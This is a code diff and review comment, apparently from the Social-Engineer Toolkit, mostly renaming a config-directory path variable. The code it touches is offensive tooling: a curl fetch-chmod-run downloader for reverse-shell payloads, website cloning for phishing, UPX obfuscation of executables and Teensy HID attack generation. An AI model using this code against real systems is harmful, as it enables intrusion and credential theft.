fileopen = open(setdir + "/msf.exe", "rb") fileopen = open(userconfigpath + "msf.exe", "rb")
data = fileopen.read() data = fileopen.read()
filewrite = open(setdir + "/msf.exe", "wb") filewrite = open(userconfigpath + "msf.exe", "wb")
filewrite.write(data.replace(str(rPort), str(port) + "\x00", 1)) filewrite.write(data.replace(str(rPort), str(port) + "\x00", 1))
filewrite.close() filewrite.close()
@ -152,22 +152,22 @@ if upx_encode == "ON" or upx_encode == "on":
# core upx # core upx
pass pass
if os.path.isfile(setdir + "/web_clone/msf.exe"): if os.path.isfile(userconfigpath + "web_clone/msf.exe"):
os.remove(setdir + "/web_clone/msf.exe") os.remove(userconfigpath + "web_clone/msf.exe")
if os.path.isfile(setdir + "/msf.exe"): if os.path.isfile(userconfigpath + "msf.exe"):
shutil.copyfile(setdir + "/msf.exe", setdir + "/web_clone/msf.exe") shutil.copyfile(userconfigpath + "msf.exe", userconfigpath + "web_clone/msf.exe")
if payload_selection == "SETSHELL": if payload_selection == "SETSHELL":
if os.path.isfile(setdir + "/web_clone/x"): if os.path.isfile(userconfigpath + "web_clone/x"):
os.remove(setdir + "/web_clone/x") os.remove(userconfigpath + "web_clone/x")
shutil.copyfile("%s/src/payloads/set_payloads/shell.windows" % shutil.copyfile("%s/src/payloads/set_payloads/shell.windows" %
(definepath), setdir + "/web_clone/x") (definepath), userconfigpath + "web_clone/x")
# if we are targetting nix # if we are targetting nix
if posix == True: if posix == True:
print_info( print_info(
"Targetting of OSX/Linux (POSIX-based) as well. Prepping posix payload...") "Targetting of OSX/Linux (POSIX-based) as well. Prepping posix payload...")
filewrite = open(setdir + "/web_clone/mac.bin", "w") filewrite = open(userconfigpath + "web_clone/mac.bin", "w")
payload_flags = webserver.split(" ") payload_flags = webserver.split(" ")
# grab osx binary name # grab osx binary name
osx_name = generate_random_string(10, 10) osx_name = generate_random_string(10, 10)
@ -255,21 +255,21 @@ if posix == True:
linux_name = generate_random_string(10, 10) linux_name = generate_random_string(10, 10)
downloader = "#!/usr/bin/sh\ncurl -C - -O http://%s/%s\nchmod +x %s\n./%s %s %s &" % ( downloader = "#!/usr/bin/sh\ncurl -C - -O http://%s/%s\nchmod +x %s\n./%s %s %s &" % (
payload_flags[1], linux_name, linux_name, linux_name, payload_flags[1], payload_flags[2]) payload_flags[1], linux_name, linux_name, linux_name, payload_flags[1], payload_flags[2])
filewrite = open(setdir + "/web_clone/nix.bin", "w") filewrite = open(userconfigpath + "web_clone/nix.bin", "w")
filewrite.write(downloader) filewrite.write(downloader)
filewrite.close() filewrite.close()
shutil.copyfile(definepath + "/src/payloads/set_payloads/shell.osx", shutil.copyfile(definepath + "/src/payloads/set_payloads/shell.osx",
setdir + "/web_clone/%s" % (osx_name)) userconfigpath + "web_clone/%s" % (osx_name))
shutil.copyfile(definepath + "/src/payloads/set_payloads/shell.linux", shutil.copyfile(definepath + "/src/payloads/set_payloads/shell.linux",
setdir + "/web_clone/%s" % (linux_name)) userconfigpath + "web_clone/%s" % (linux_name))
# copy over the downloader scripts # copy over the downloader scripts
osx_down = check_options("MAC.BIN=") osx_down = check_options("MAC.BIN=")
lin_down = check_options("NIX.BIN=") lin_down = check_options("NIX.BIN=")
shutil.copyfile(setdir + "/web_clone/nix.bin", shutil.copyfile(userconfigpath + "web_clone/nix.bin",
setdir + "/web_clone/%s" % (lin_down)) userconfigpath + "web_clone/%s" % (lin_down))
shutil.copyfile(setdir + "/web_clone/mac.bin", shutil.copyfile(userconfigpath + "web_clone/mac.bin",
setdir + "/web_clone/%s" % (osx_down)) userconfigpath + "web_clone/%s" % (osx_down))
# check to see if we are using a staged approach or direct shell # check to see if we are using a staged approach or direct shell
stager = check_config("SET_SHELL_STAGER=").lower() stager = check_config("SET_SHELL_STAGER=").lower()
@ -277,11 +277,11 @@ if stager == "off" or payload_selection == "SETSHELL_HTTP":
# only trigger if we are using the SETSHELL # only trigger if we are using the SETSHELL
if payload_selection == "SETSHELL" or payload_selection == "SETSHELL_HTTP": if payload_selection == "SETSHELL" or payload_selection == "SETSHELL_HTTP":
# ensure that index.html is really there # ensure that index.html is really there
if os.path.isfile(setdir + "/web_clone/index.html"): if os.path.isfile(userconfigpath + "web_clone/index.html"):
print_status( print_status(
"Stager turned off, prepping direct download payload...") "Stager turned off, prepping direct download payload...")
fileopen = open(setdir + "/web_clone/index.html", "r") fileopen = open(userconfigpath + "web_clone/index.html", "r")
filewrite = open(setdir + "/web_clone/index.html.3", "w") filewrite = open(userconfigpath + "web_clone/index.html.3", "w")
data = fileopen.read() data = fileopen.read()
# replace freehugs with ip and port # replace freehugs with ip and port
data = data.replace("freehugs", reverse_connection) data = data.replace("freehugs", reverse_connection)
@ -293,22 +293,22 @@ if stager == "off" or payload_selection == "SETSHELL_HTTP":
# be newer # be newer
if payload_selection == "SETSHELL": if payload_selection == "SETSHELL":
try: try:
if os.path.isfile(setdir + "/web_clone/index.html"): if os.path.isfile(userconfigpath + "web_clone/index.html"):
os.remove(setdir + "/web_clone/index.html") os.remove(userconfigpath + "web_clone/index.html")
shutil.copyfile(setdir + "/web_clone/index.html.3", shutil.copyfile(userconfigpath + "web_clone/index.html.3",
setdir + "/web_clone/index.html") userconfigpath + "web_clone/index.html")
if os.path.isfile(setdir + "/web_clone/index.html.3"): if os.path.isfile(userconfigpath + "web_clone/index.html.3"):
os.remove(setdir + "/web_clone/index.html.3") os.remove(userconfigpath + "web_clone/index.html.3")
if os.path.isfile(setdir + "/web_clone/msf.exe"): if os.path.isfile(userconfigpath + "web_clone/msf.exe"):
os.remove(setdir + "/web_clone/msf.exe") os.remove(userconfigpath + "web_clone/msf.exe")
shutil.copyfile(setdir + "/web_clone/x", shutil.copyfile(userconfigpath + "web_clone/x",
setdir + "/web_clone/msf.exe") userconfigpath + "web_clone/msf.exe")
shutil.copyfile( shutil.copyfile(
setdir + "/web_clone/msf.exe", setdir + "/msf.exe") userconfigpath + "web_clone/msf.exe", userconfigpath + "msf.exe")
if os.path.isfile(setdir + "/msf.exe"): if os.path.isfile(userconfigpath + "msf.exe"):
os.remove(setdir + "/msf.exe") os.remove(userconfigpath + "msf.exe")
shutil.copyfile( shutil.copyfile(
setdir + "/web_clone/msf.exe", setdir + "/msf.exe") userconfigpath + "web_clone/msf.exe", userconfigpath + "msf.exe")
# catch errors, will convert to log later # catch errors, will convert to log later
except Exception as error: except Exception as error:
@ -317,22 +317,22 @@ if stager == "off" or payload_selection == "SETSHELL_HTTP":
# if we are using the HTTP reverse shell then lets use this # if we are using the HTTP reverse shell then lets use this
if payload_selection == "SETSHELL_HTTP": if payload_selection == "SETSHELL_HTTP":
try: try:
if os.path.isfile(setdir + "/web_clone/index.html"): if os.path.isfile(userconfigpath + "web_clone/index.html"):
os.remove(setdir + "/web_clone/index.html") os.remove(userconfigpath + "web_clone/index.html")
shutil.copyfile(setdir + "/web_clone/index.html.3", shutil.copyfile(userconfigpath + "web_clone/index.html.3",
setdir + "/web_clone/index.html") userconfigpath + "web_clone/index.html")
if os.path.isfile(setdir + "/web_clone/index.html.3"): if os.path.isfile(userconfigpath + "web_clone/index.html.3"):
os.remove(setdir + "/web_clone/index.html.3") os.remove(userconfigpath + "web_clone/index.html.3")
if os.path.isfile(setdir + "/web_clone/msf.exe"): if os.path.isfile(userconfigpath + "web_clone/msf.exe"):
os.remove(setdir + "/web_clone/msf.exe") os.remove(userconfigpath + "web_clone/msf.exe")
shutil.copyfile( shutil.copyfile(
"src/payloads/set_payloads/http_shell.binary", setdir + "/web_clone/msf.exe") "src/payloads/set_payloads/http_shell.binary", userconfigpath + "web_clone/msf.exe")
shutil.copyfile( shutil.copyfile(
setdir + "/web_clone/msf.exe", setdir + "/msf.exe") userconfigpath + "web_clone/msf.exe", userconfigpath + "msf.exe")
if os.path.isfile(setdir + "/msf.exe"): if os.path.isfile(userconfigpath + "msf.exe"):
os.remove(setdir + "/msf.exe") os.remove(userconfigpath + "msf.exe")
shutil.copyfile( shutil.copyfile(
setdir + "/web_clone/msf.exe", setdir + "/msf.exe") userconfigpath + "web_clone/msf.exe", userconfigpath + "msf.exe")
# catch errors, will convert to log later # catch errors, will convert to log later
except Exception as error: except Exception as error:


@ -205,7 +205,7 @@ try:
try: try:
# write our attack vector to file to be called later # write our attack vector to file to be called later
filewrite = open(setdir + "/attack_vector", "w") filewrite = open(userconfigpath + "attack_vector", "w")
# webjacking and web templates are not allowed # webjacking and web templates are not allowed
if attack_vector == "5" and choice3 == "1": if attack_vector == "5" and choice3 == "1":
@ -329,7 +329,7 @@ try:
["2"], "IP address to SET web server (this could be your external IP or hostname)")) ["2"], "IP address to SET web server (this could be your external IP or hostname)"))
filewrite2 = open( filewrite2 = open(
setdir + "/interface", "w") userconfigpath + "interface", "w")
filewrite2.write( filewrite2.write(
ipquestion) ipquestion)
filewrite2.close() filewrite2.close()
@ -407,8 +407,8 @@ try:
sys.path.append(definepath + "/src/html/") sys.path.append(definepath + "/src/html/")
# clean up stale file # clean up stale file
if os.path.isfile(setdir + "/cloner.failed"): if os.path.isfile(userconfigpath + "cloner.failed"):
os.remove(setdir + "/cloner.failed") os.remove(userconfigpath + "cloner.failed")
site_cloned = True site_cloned = True
@ -429,7 +429,7 @@ try:
except: except:
import src.core.payloadgen.create_payloads import src.core.payloadgen.create_payloads
if os.path.isfile(setdir + "/cloner.failed"): if os.path.isfile(userconfigpath + "cloner.failed"):
site_cloned = False site_cloned = False
if site_cloned == True: if site_cloned == True:
@ -506,9 +506,9 @@ try:
definepath = os.getcwd() definepath = os.getcwd()
sys.path.append( sys.path.append(
definepath + "/src/webattack/web_clone/") definepath + "/src/webattack/web_clone/")
if os.path.isfile(setdir + "/site.template"): if os.path.isfile(userconfigpath + "site.template"):
os.remove(setdir + "/site.template") os.remove(userconfigpath + "site.template")
filewrite = open(setdir + "/site.template", "w") filewrite = open(userconfigpath + "site.template", "w")
filewrite.write("TEMPLATE=CUSTOM") filewrite.write("TEMPLATE=CUSTOM")
print_info("SET supports both HTTP and HTTPS") print_info("SET supports both HTTP and HTTPS")
# specify the site to clone # specify the site to clone
@ -574,7 +574,7 @@ try:
except: except:
import src.webattack.web_clone.cloner import src.webattack.web_clone.cloner
if os.path.isfile(setdir + "/cloner.failed"): if os.path.isfile(userconfigpath + "cloner.failed"):
site_cloned = False site_cloned = False
if site_cloned == True: if site_cloned == True:
@ -652,13 +652,13 @@ try:
sys.path.append( sys.path.append(
definepath + "/src/webattack/web_clone/") definepath + "/src/webattack/web_clone/")
if os.path.isfile(setdir + "/site.template"): if os.path.isfile(userconfigpath + "site.template"):
os.remove(setdir + "/site.template") os.remove(userconfigpath + "site.template")
filewrite = open(setdir + "/site.template", "w") filewrite = open(userconfigpath + "site.template", "w")
filewrite.write("TEMPLATE=SELF") filewrite.write("TEMPLATE=SELF")
# specify the site to clone # specify the site to clone
if not os.path.isdir(setdir + "/web_clone"): if not os.path.isdir(userconfigpath + "web_clone"):
os.makedirs(setdir + "/web_clone") os.makedirs(userconfigpath + "web_clone")
print_warning( print_warning(
"Example: /home/website/ (make sure you end with /)") "Example: /home/website/ (make sure you end with /)")
print_warning( print_warning(
@ -671,11 +671,11 @@ try:
if not os.path.isfile(URL + "index.html"): if not os.path.isfile(URL + "index.html"):
if os.path.isfile(URL): if os.path.isfile(URL):
shutil.copyfile( shutil.copyfile(
"%s" % (URL), setdir + "/web_clone/index.html") "%s" % (URL), userconfigpath + "web_clone/index.html")
if not os.path.isfile(URL): if not os.path.isfile(URL):
if URL.endswith("index.html"): if URL.endswith("index.html"):
shutil.copyfile( shutil.copyfile(
URL, "%s/web_clone/index.html" % (setdir)) URL, "%s/web_clone/index.html" % (userconfigpath))
else: else:
print_error("ERROR:index.html not found!!") print_error("ERROR:index.html not found!!")
print_error( print_error(
@ -690,11 +690,11 @@ try:
choice = raw_input( choice = raw_input(
"\n1. Copy just the index.html\n2. Copy the entire folder\n\nEnter choice [1/2]: ") "\n1. Copy just the index.html\n2. Copy the entire folder\n\nEnter choice [1/2]: ")
if choice == "1" or choice == "": if choice == "1" or choice == "":
if os.path.isfile("%s/web_clone/index.html" % (setdir)): if os.path.isfile("%s/web_clone/index.html" % (userconfigpath)):
os.remove( os.remove(
"%s/web_clone/index.html" % (setdir)) "%s/web_clone/index.html" % (userconfigpath))
shutil.copyfile( shutil.copyfile(
URL + "index.html", "%s/web_clone/" % (setdir)) URL + "index.html", "%s/web_clone/" % (userconfigpath))
if choice == "2": if choice == "2":
if os.path.isdir(URL + "src/webattack"): if os.path.isdir(URL + "src/webattack"):
print_error( print_error(
@ -705,7 +705,7 @@ try:
print_error( print_error(
"You tried the same thing. Exiting now.") "You tried the same thing. Exiting now.")
sys.exit() sys.exit()
copyfolder(URL, "%s/web_clone/" % setdir) copyfolder(URL, "%s/web_clone/" % userconfigpath)
filewrite.write("\nURL=%s" % (URL)) filewrite.write("\nURL=%s" % (URL))
filewrite.close() filewrite.close()
@ -782,7 +782,7 @@ try:
if not match: if not match:
if not match1: if not match1:
URL = ("http://" + URL) URL = ("http://" + URL)
filewrite = open(setdir + "/site.template", "w") filewrite = open(userconfigpath + "site.template", "w")
filewrite.write("\nURL=%s" % (URL)) filewrite.write("\nURL=%s" % (URL))
filewrite.close() filewrite.close()
@ -807,7 +807,7 @@ try:
if not match: if not match:
if not match1: if not match1:
URL = ("http://" + URL) URL = ("http://" + URL)
filewrite = open(setdir + "/site.template", "w") filewrite = open(userconfigpath + "site.template", "w")
filewrite.write("\nURL=%s" % (URL)) filewrite.write("\nURL=%s" % (URL))
filewrite.close() filewrite.close()
# start tabnabbing here # start tabnabbing here
@ -879,13 +879,13 @@ try:
setprompt(["3"], "IP address for the reverse connection (payload)")) setprompt(["3"], "IP address for the reverse connection (payload)"))
update_options("IPADDR=" + ipaddr) update_options("IPADDR=" + ipaddr)
filewrite1 = open(setdir + "/payloadgen", "w") filewrite1 = open(userconfigpath + "payloadgen", "w")
filewrite1.write("payloadgen=solo") filewrite1.write("payloadgen=solo")
filewrite1.close() filewrite1.close()
# if choice is file-format # if choice is file-format
if infectious_menu_choice == "1": if infectious_menu_choice == "1":
filewrite = open(setdir + "/fileformat.file", "w") filewrite = open(userconfigpath + "fileformat.file", "w")
filewrite.write("fileformat=on") filewrite.write("fileformat=on")
filewrite.close() filewrite.close()
sys.path.append(definepath + "/src/core/msf_attacks/") sys.path.append(definepath + "/src/core/msf_attacks/")
@ -923,8 +923,8 @@ try:
# try: import src.core.payloadgen.solo # try: import src.core.payloadgen.solo
# except: module_reload(src.core.payloadgen.solo) # except: module_reload(src.core.payloadgen.solo)
# if the set payload is there # if the set payload is there
if os.path.isfile(setdir + "/msf.exe"): if os.path.isfile(userconfigpath + "msf.exe"):
shutil.copyfile(setdir + "/msf.exe", "payload.exe") shutil.copyfile(userconfigpath + "msf.exe", "payload.exe")
return_continue() return_continue()
# Main Menu choice 5: Mass Mailer Attack # Main Menu choice 5: Mass Mailer Attack
@ -953,7 +953,7 @@ try:
if teensy_menu_choice != "99": if teensy_menu_choice != "99":
# set our teensy info file in program junk # set our teensy info file in program junk
filewrite = open(setdir + "/teensy", "w") filewrite = open(userconfigpath + "teensy", "w")
filewrite.write(teensy_menu_choice + "\n") filewrite.write(teensy_menu_choice + "\n")
if teensy_menu_choice != "3" and teensy_menu_choice != "7" and teensy_menu_choice != "8" and teensy_menu_choice != "9" and teensy_menu_choice != "10" and teensy_menu_choice != "11" and teensy_menu_choice != "12" and teensy_menu_choice != "13" and teensy_menu_choice != "14": if teensy_menu_choice != "3" and teensy_menu_choice != "7" and teensy_menu_choice != "8" and teensy_menu_choice != "9" and teensy_menu_choice != "10" and teensy_menu_choice != "11" and teensy_menu_choice != "12" and teensy_menu_choice != "13" and teensy_menu_choice != "14":
yes_or_no = yesno_prompt( yes_or_no = yesno_prompt(
@ -972,10 +972,10 @@ try:
if yes_or_no == "NO": if yes_or_no == "NO":
filewrite.close() filewrite.close()
# need these default files for web server load # need these default files for web server load
filewrite = open(setdir + "/site.template", "w") filewrite = open(userconfigpath + "site.template", "w")
filewrite.write("TEMPLATE=CUSTOM") filewrite.write("TEMPLATE=CUSTOM")
filewrite.close() filewrite.close()
filewrite = open(setdir + "/attack_vector", "w") filewrite = open(userconfigpath + "attack_vector", "w")
filewrite.write("hid") filewrite.write("hid")
filewrite.close() filewrite.close()
# if we are doing binary2teensy # if we are doing binary2teensy
@ -998,10 +998,10 @@ try:
if teensy_menu_choice == "9": if teensy_menu_choice == "9":
print_status( print_status(
"Generating the SD2Teensy OSX ino file for you...") "Generating the SD2Teensy OSX ino file for you...")
if not os.path.isdir(setdir + "/reports/osx_sd2teensy"): if not os.path.isdir(userconfigpath + "reports/osx_sd2teensy"):
os.makedirs(setdir + "/reports/osx_sd2teensy") os.makedirs(userconfigpath + "reports/osx_sd2teensy")
shutil.copyfile("src/teensy/osx_sd2teensy.ino", shutil.copyfile("src/teensy/osx_sd2teensy.ino",
"%s/reports/osx_sd2teensy/osx_sd2teensy.ino" % (setdir)) "%s/reports/osx_sd2teensy/osx_sd2teensy.ino" % (userconfigpath))
print_status( print_status(
"File has been exported to ~/.set/reports/osx_sd2teensy/osx_sd2teensy.ino") "File has been exported to ~/.set/reports/osx_sd2teensy/osx_sd2teensy.ino")
return_continue() return_continue()
@ -1010,12 +1010,12 @@ try:
if teensy_menu_choice == "10": if teensy_menu_choice == "10":
print_status( print_status(
"Generating the Arduino sniffer and libraries ino..") "Generating the Arduino sniffer and libraries ino..")
if not os.path.isdir(setdir + "/reports/arduino_sniffer"): if not os.path.isdir(userconfigpath + "reports/arduino_sniffer"):
os.makedirs(setdir + "/reports/arduino_sniffer") os.makedirs(userconfigpath + "reports/arduino_sniffer")
shutil.copyfile("src/teensy/x10/x10_sniffer.ino", shutil.copyfile("src/teensy/x10/x10_sniffer.ino",
setdir + "/reports/arduino_sniffer/x10_sniffer.ino") userconfigpath + "reports/arduino_sniffer/x10_sniffer.ino")
shutil.copyfile("src/teensy/x10/libraries.zip", shutil.copyfile("src/teensy/x10/libraries.zip",
setdir + "/reports/arduino_sniffer/libraries.zip") userconfigpath + "reports/arduino_sniffer/libraries.zip")
print_status( print_status(
"Arduino sniffer files and libraries exported to ~/.set/reports/arduino_sniffer") "Arduino sniffer files and libraries exported to ~/.set/reports/arduino_sniffer")
return_continue() return_continue()
@ -1024,12 +1024,12 @@ try:
if teensy_menu_choice == "11": if teensy_menu_choice == "11":
print_status( print_status(
"Generating the Arduino jammer ino and libraries...") "Generating the Arduino jammer ino and libraries...")
if not os.path.isdir(setdir + "/reports/arduino_jammer"): if not os.path.isdir(userconfigpath + "reports/arduino_jammer"):
os.makedirs(setdir + "/reports/arduino_jammer") os.makedirs(userconfigpath + "reports/arduino_jammer")
shutil.copyfile("src/teensy/x10/x10_blackout.ino", shutil.copyfile("src/teensy/x10/x10_blackout.ino",
setdir + "/reports/arduino_jammer/x10_blackout.ino") userconfigpath + "reports/arduino_jammer/x10_blackout.ino")
shutil.copyfile("src/teensy/x10/libraries.zip", shutil.copyfile("src/teensy/x10/libraries.zip",
setdir + "/reports/arduino_jammer/libraries.zip") userconfigpath + "reports/arduino_jammer/libraries.zip")
print_status( print_status(
"Arduino jammer files and libraries exported to ~/.set/reports/arduino_jammer") "Arduino jammer files and libraries exported to ~/.set/reports/arduino_jammer")
return_continue() return_continue()
@ -1164,8 +1164,8 @@ and send the QRCode via a mailer.
"Enter the URL you want the QRCode to go to (99 to exit): ") "Enter the URL you want the QRCode to go to (99 to exit): ")
if url != "99": if url != "99":
# if the reports directory does not exist then create it # if the reports directory does not exist then create it
if not os.path.isdir("%s/reports" % (setdir)): if not os.path.isdir("%s/reports" % (userconfigpath)):
os.makedirs("%s/reports" % (setdir)) os.makedirs("%s/reports" % (userconfigpath))
gen_qrcode(url) gen_qrcode(url)
return_continue() return_continue()
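Review bot: In the `choice == "1"` branch of the hunk at @ -690, `shutil.copyfile(URL + "index.html", "%s/web_clone/" % (userconfigpath))` passes a directory as the destination, which `copyfile` refuses (it opens `dst` for writing), so copying only index.html fails after the rename just as before; it should name the target file, `shutil.copyfile(URL + "index.html", os.path.join(userconfigpath, "web_clone", "index.html"))`. The same hunk and the one at @ -671 keep the `"%s/web_clone/..." % (userconfigpath)` form while the rest of the section switched to `userconfigpath + "web_clone/..."`, so these paths now carry a doubled slash and the whole file silently depends on `userconfigpath` ending in a separator; `os.path.join(userconfigpath, "web_clone", ...)` throughout removes both the inconsistency and the assumption. The status messages in the teensy hunks (@ -998, @ -1010, @ -1024) still hard-code `~/.set/reports/...` while the files are written under `userconfigpath`, so printing the computed path (for example `"File has been exported to %s" % os.path.join(userconfigpath, "reports", "osx_sd2teensy", "osx_sd2teensy.ino")`) keeps the message truthful if the config directory is relocated. The enclosing `try` block starts and ends outside this section.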


@ -332,7 +332,7 @@ def meta_path():
# pull from config first # pull from config first
msf_path = check_config("METASPLOIT_PATH=") msf_path = check_config("METASPLOIT_PATH=")
if not str(msf_path.endswith("/")): if not msf_path.endswith("/"):
msf_path = msf_path + "/" msf_path = msf_path + "/"
if os.path.isfile(msf_path + "msfconsole"): if os.path.isfile(msf_path + "msfconsole"):
trigger = 1 trigger = 1
@ -463,11 +463,11 @@ def cleanup_routine():
try: try:
# restore original Java Applet # restore original Java Applet
shutil.copyfile("%s/src/html/Signed_Update.jar.orig" % shutil.copyfile("%s/src/html/Signed_Update.jar.orig" %
(definepath()), setdir + "/Signed_Update.jar") (definepath()), userconfigpath + "Signed_Update.jar")
if os.path.isfile("newcert.pem"): if os.path.isfile("newcert.pem"):
os.remove("newcert.pem") os.remove("newcert.pem")
if os.path.isfile(setdir + "/interfaces"): if os.path.isfile(userconfigpath + "interfaces"):
os.remove(setdir + "/interfaces") os.remove(userconfigpath + "interfaces")
if os.path.isfile("src/html/1msf.raw"): if os.path.isfile("src/html/1msf.raw"):
os.remove("src/html/1msf.raw") os.remove("src/html/1msf.raw")
if os.path.isfile("src/html/2msf.raw"): if os.path.isfile("src/html/2msf.raw"):
@ -476,10 +476,10 @@ def cleanup_routine():
os.remove("msf.exe") os.remove("msf.exe")
if os.path.isfile("src/html/index.html"): if os.path.isfile("src/html/index.html"):
os.remove("src/html/index.html") os.remove("src/html/index.html")
if os.path.isfile(setdir + "/Signed_Update.jar"): if os.path.isfile(userconfigpath + "Signed_Update.jar"):
os.remove(setdir + "/Signed_Update.jar") os.remove(userconfigpath + "Signed_Update.jar")
if os.path.isfile(setdir + "/version.lock"): if os.path.isfile(userconfigpath + "version.lock"):
os.remove(setdir + "/version.lock") os.remove(userconfigpath + "version.lock")
except: except:
pass pass
@ -559,19 +559,19 @@ def generate_random_string(low, high):
def site_cloner(website, exportpath, *args): def site_cloner(website, exportpath, *args):
grab_ipaddress() grab_ipaddress()
ipaddr = grab_ipaddress() ipaddr = grab_ipaddress()
filewrite = open(setdir + "/interface", "w") filewrite = open(userconfigpath + "interface", "w")
filewrite.write(ipaddr) filewrite.write(ipaddr)
filewrite.close() filewrite.close()
filewrite = open(setdir + "/ipaddr", "w") filewrite = open(userconfigpath + "ipaddr", "w")
filewrite.write(ipaddr) filewrite.write(ipaddr)
filewrite.close() filewrite.close()
filewrite = open(setdir + "/site.template", "w") filewrite = open(userconfigpath + "site.template", "w")
filewrite.write("URL=" + website) filewrite.write("URL=" + website)
filewrite.close() filewrite.close()
# if we specify a second argument this means we want to use java applet # if we specify a second argument this means we want to use java applet
if args[0] == "java": if args[0] == "java":
# needed to define attack vector # needed to define attack vector
filewrite = open(setdir + "/attack_vector", "w") filewrite = open(userconfigpath + "attack_vector", "w")
filewrite.write("java") filewrite.write("java")
filewrite.close() filewrite.close()
sys.path.append("src/webattack/web_clone") sys.path.append("src/webattack/web_clone")
@ -586,7 +586,7 @@ def site_cloner(website, exportpath, *args):
# copy the file to a new folder # copy the file to a new folder
print_status("Site has been successfully cloned and is: " + exportpath) print_status("Site has been successfully cloned and is: " + exportpath)
subprocess.Popen("mkdir '%s';cp %s/web_clone/* '%s'" % (exportpath, setdir, subprocess.Popen("mkdir '%s';cp %s/web_clone/* '%s'" % (exportpath, userconfigpath,
exportpath), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait() exportpath), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
@ -666,7 +666,7 @@ def java_applet_attack(website, port, directory):
if check_options != 0: if check_options != 0:
# move the file to the specified directory and filename # move the file to the specified directory and filename
subprocess.Popen("cp %s/msf.exe %s/%s" % (setdir, directory, filename), subprocess.Popen("cp %s/msf.exe %s/%s" % (userconfigpath, directory, filename),
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait() stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
applet_name = check_options("APPLET_NAME=") applet_name = check_options("APPLET_NAME=")
@ -675,7 +675,7 @@ def java_applet_attack(website, port, directory):
# lastly we need to copy over the signed applet # lastly we need to copy over the signed applet
subprocess.Popen( subprocess.Popen(
"cp %s/Signed_Update.jar %s/%s" % (setdir, directory, applet_name), "cp %s/Signed_Update.jar %s/%s" % (userconfigpath, directory, applet_name),
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait() stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
# start the web server by running it in the background # start the web server by running it in the background
@ -700,41 +700,41 @@ def teensy_pde_generator(attack_method):
if attack_method == "beef": if attack_method == "beef":
# specify the filename # specify the filename
filename = open("src/teensy/beef.ino", "r") filename = open("src/teensy/beef.ino", "r")
filewrite = open(setdir + "/reports/beef.ino", "w") filewrite = open(userconfigpath + "reports/beef.ino", "w")
teensy_string = ( teensy_string = (
"Successfully generated Teensy HID Beef Attack Vector under %s/reports/beef.ino" % (setdir)) "Successfully generated Teensy HID Beef Attack Vector under %s/reports/beef.ino" % (userconfigpath))
# if we are doing the attack vector teensy beef # if we are doing the attack vector teensy beef
if attack_method == "powershell_down": if attack_method == "powershell_down":
# specify the filename # specify the filename
filename = open("src/teensy/powershell_down.ino", "r") filename = open("src/teensy/powershell_down.ino", "r")
filewrite = open(setdir + "/reports/powershell_down.ino", "w") filewrite = open(userconfigpath + "reports/powershell_down.ino", "w")
teensy_string = ( teensy_string = (
"Successfully generated Teensy HID Attack Vector under %s/reports/powershell_down.ino" % (setdir)) "Successfully generated Teensy HID Attack Vector under %s/reports/powershell_down.ino" % (userconfigpath))
# if we are doing the attack vector teensy # if we are doing the attack vector teensy
if attack_method == "powershell_reverse": if attack_method == "powershell_reverse":
# specify the filename # specify the filename
filename = open("src/teensy/powershell_reverse.ino", "r") filename = open("src/teensy/powershell_reverse.ino", "r")
filewrite = open(setdir + "/reports/powershell_reverse.ino", "w") filewrite = open(userconfigpath + "reports/powershell_reverse.ino", "w")
teensy_string = ( teensy_string = (
"Successfully generated Teensy HID Attack Vector under %s/reports/powershell_reverse.ino" % (setdir)) "Successfully generated Teensy HID Attack Vector under %s/reports/powershell_reverse.ino" % (userconfigpath))
# if we are doing the attack vector teensy beef # if we are doing the attack vector teensy beef
if attack_method == "java_applet": if attack_method == "java_applet":
# specify the filename # specify the filename
filename = open("src/teensy/java_applet.ino", "r") filename = open("src/teensy/java_applet.ino", "r")
filewrite = open(setdir + "/reports/java_applet.ino", "w") filewrite = open(userconfigpath + "reports/java_applet.ino", "w")
teensy_string = ( teensy_string = (
"Successfully generated Teensy HID Attack Vector under %s/reports/java_applet.ino" % (setdir)) "Successfully generated Teensy HID Attack Vector under %s/reports/java_applet.ino" % (userconfigpath))
# if we are doing the attack vector teensy # if we are doing the attack vector teensy
if attack_method == "wscript": if attack_method == "wscript":
# specify the filename # specify the filename
filename = open("src/teensy/wscript.ino", "r") filename = open("src/teensy/wscript.ino", "r")
filewrite = open(setdir + "/reports/wscript.ino", "w") filewrite = open(userconfigpath + "reports/wscript.ino", "w")
teensy_string = ( teensy_string = (
"Successfully generated Teensy HID Attack Vector under %s/reports/wscript.ino" % (setdir)) "Successfully generated Teensy HID Attack Vector under %s/reports/wscript.ino" % (userconfigpath))
# All the options share this code except binary2teensy # All the options share this code except binary2teensy
if attack_method != "binary2teensy": if attack_method != "binary2teensy":
@ -750,7 +750,7 @@ def teensy_pde_generator(attack_method):
# specify the filename # specify the filename
import src.teensy.binary2teensy import src.teensy.binary2teensy
teensy_string = ( teensy_string = (
"Successfully generated Teensy HID Attack Vector under %s/reports/binary2teensy.ino" % (setdir)) "Successfully generated Teensy HID Attack Vector under %s/reports/binary2teensy.ino" % (userconfigpath))
print_status(teensy_string) print_status(teensy_string)
# #
@ -811,10 +811,10 @@ def upx(path_to_file):
"Packing the executable and obfuscating PE file randomly, one moment.") "Packing the executable and obfuscating PE file randomly, one moment.")
# packing executable # packing executable
subprocess.Popen( subprocess.Popen(
"%s -9 -q -o %s/temp.binary %s" % (upx_path, setdir, path_to_file), "%s -9 -q -o %s/temp.binary %s" % (upx_path, userconfigpath, path_to_file),
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait() stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
# move it over the old file # move it over the old file
subprocess.Popen("mv %s/temp.binary %s" % (setdir, path_to_file), subprocess.Popen("mv %s/temp.binary %s" % (userconfigpath, path_to_file),
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait() stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
# random string # random string
@ -822,7 +822,7 @@ def upx(path_to_file):
# 4 upx replace - we replace 4 upx open the file # 4 upx replace - we replace 4 upx open the file
fileopen = open(path_to_file, "rb") fileopen = open(path_to_file, "rb")
filewrite = open(setdir + "/temp.binary", "wb") filewrite = open(userconfigpath + "temp.binary", "wb")
# read the file open for data # read the file open for data
